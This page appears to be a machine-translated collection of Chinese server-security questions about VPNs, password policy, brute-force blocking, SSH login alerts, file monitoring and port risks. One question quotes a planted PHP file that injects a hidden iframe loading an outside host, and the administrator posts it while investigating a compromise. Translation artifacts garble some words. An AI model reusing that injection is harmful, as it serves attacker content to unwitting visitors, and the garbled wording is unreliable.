Articles of 安全

VPN的安全性

我有一个服务器,将保存一些敏感的数据。 目前,通过SSH限制对服务器的访问,并且只限于一个人。 然而,服务器与许多其他计算机在同一networking上,并且具有相同范围的IP(尽pipe受防火墙保护)。 我已经读过,一个额外的安全措施是通过encryption的VPN连接到服务器,因此没有与其他计算机在同一networking上的服务器。 如果我们将来想要扩展安全性,我们可以添加令牌authentication。 有谁能告诉我,如果以上是可行的,如果是有意义的build立? 我无法理解VPN如何工作,没有获得VPN路由器并通过它连接。 任何反馈和指针都会有所帮助。

通常密码会好多久?

不知道在哪里问这个问题。 我的老板问我平时多久换一次密码? 我们现在正在开发一个需要高安全性的系统。 EDIT: 我的意思是在强制用户更改密码之前有多less天。

我越来越暴力,我该怎么做

我越来越暴力强行到我的电子邮件服务器,IMAP和POP3。 我已经安装了完整的ASL软件包,但它只是给我发送OSSEC日志。 我怎样才能禁止IP。 我想ASL在一些错误的尝试后自动阻止了这些攻击。 我怎样才能做到这一点。

我如何从黑客或安全angular度学习Linux

我有兴趣进入安全领域,然后我研究了各种各样的职位。 有人告诉我必须首先从安全的angular度来了解unix系统,然后才能走得更远。 我只知道基本的Linux,我的公司有本地服务器的Ubuntu和VPS服务器centos 5.我通过托pipe网站和其他小东西,如备份,cron等pipe理。 但我不知道什么关于日志等有人写了以下开始: 观看实时tcpdump会话,系统日志条目,web服务器日志,snort转储,转储实时系统内存,以及上百万个其他开源工具,用于在正在运行的系统的内部窥视和戳穿。 也: 获取正在运行的SMTP服务器,并观察垃圾邮件机器人并扫描恶意软件。 设置一个Web服务器并观察脚本小子在您的Web和数据库日志中尝试SQL注入攻击。 注意您的SSH日志蛮力攻击。 build立一个共同的博客引擎,并消除垃圾邮件机器人和攻击的乐趣。 了解如何部署各种虚拟化技术来相互分隔服务。 如果ACL,MAC和系统级审计值得花费额外的工作和麻烦超过标准的系统权限,请亲身体验一下。 现在我真的想要所有的东西。 任何人都可以指导我阅读任何书籍。 video讲座,考试可以帮助我做这些事情。 每当我学习Linux的新东西时,都会将其应用于我的实时服务器。 我就是这样学习了所有的Linux。 有任何想法吗

build立一个不可追踪的networking服务器

我有一个正在托pipe一些数据的朋友可以使用两种方法从服务器上下载: 使用他们首先必须下载到他们的移动设备的应用程序 直接访问网站 然而,对于数据有两个重要的考虑因素:它非常敏感,因为他不希望任何“中间人”能够分辨谁获得了数据或来自哪里(来自服务器/ ISP日志等等)。 )。 当访问者在世界范围内的带宽非常有限时也应该可以访问。 数据应该是公开的,并且知道其存在的人容易获得。 这里的最终目标是保护访问者,使中间人无法分辨访问者要求的内容或他/她要求的内容。 基本上,我们希望,正如标题所说,一个不可追踪的networking服务器。 为了帮助隐藏中间人的日志中的网站身份,并帮助保护请求数据的个人,我想一个解决scheme是build立几个地理上分散的代理服务器, No-IP.com。 我认为以某种方式encryption从A点到B点的数据也是一件好事(超越了简单的SSL)。 除了编码方面的考虑,我想知道你们将如何在项目的服务器和networking端实现这种安全性。 我的想法使用像no-ip.com这样的服务,在全球范围内使用许多不同的代理服务器是否有意义? PS:我意识到这篇文章中的一些东西是模糊的。 不幸的是,我不能具体说明数据是什么,或者为什么我们需要这样一个安全的基础设施 – 出于同样的原因,我们完全需要它。 如果您有任何疑问或问题,请随时直接与我联系。

如何监视文件/目录的变化

我有一台运行Debian Lenny的服务器。 最近我遇到了一些安全问题。 我特意看到/etc/php5/conf.d中创build了一个名为“php-dev.ini”的文件。 乍一看,文件看起来正常无害,直到你打开它。 它包含: <?php print "<iframe src='http://google-traf.zyns.com/index.php?tp=4abd7c0637c89d7a' width='1' height='1' frameborder='0'></iframe>"; ?> 很显然,我知道服务器存在安全问题,所以请把“服务器修好了吗? 响应。 这已经完成了。 该服务器已被检查rootkit,并没有可疑的帐户。 我特别感兴趣的是用户或PID正在写入这个目录,并且正在寻找可以用来帮助我的工具。 我已经研究过“iwatch”和“inotify”,但是在我走下一条研究之路之前,我想要得到别人的反馈。 有谁知道一个好的工具,可以帮助我确定: 什么用户正在写入这个目录 什么PID被用来写入文件 哪个应用程序正在写入这个目录 基本上我正在做一些取证和学习监控文件系统。 任何有识之士将不胜感激。 (编辑引用PHP代码示例,因为它以前没有显示过。)

我应该如何对恶意login做出反应?

我已经在我的服务器(密钥身份validation,没有rootlogin,协议2等)保护SSH,但我有点偏执。 我不能使用一些IPfilter,因为我想保持从我可以login自己的地方的灵活性。 我正在考虑在用户使用SSHlogin到我的系统时向我发送电子邮件。 但是这使我想知道: 比方说,我有上面的实现,我得到一个电子邮件,有人刚刚使用SSHlogin。 而且我知道这不是我:)也不是另一个pipe理员。 什么是适当的回应? 让服务器陷入恐慌? 监视恶意用户在服务器上做什么? 踢出用户? 用火杀死它? 别的东西? PS 服务器是Centos 5.7 编辑 该服务器用作Web服务器(Apache / Postgres / PHP)和邮件服务器(Zimbra)。 所以我猜数据是邮件和数据库。

如何创build虚拟用户?

我想用最less的权限创build用户。 没有家,没有权利,没有壳。 怎么做? 当我打电话useradd它创build用户与家

您在企业服务器环境中pipe理密码的想法

晚上好, 我正在考虑实施一些基于安全考虑和越来越多的服务器来pipe理Linux / Windows服务器密码的方法。 你怎么做呢? 如果有机会,你会怎么做? 我想到的可能是一个关键的服务器与组和双重authentication,或者可能是一个钥匙圈?

打开networking端口的风险是什么?

如果我写一个程序来打开一个TCP端口并运行,可以有人做什么,可以说一个回声服务器? 有人可以在我的系统上访问数据吗? 或任何其他开放端口的风险?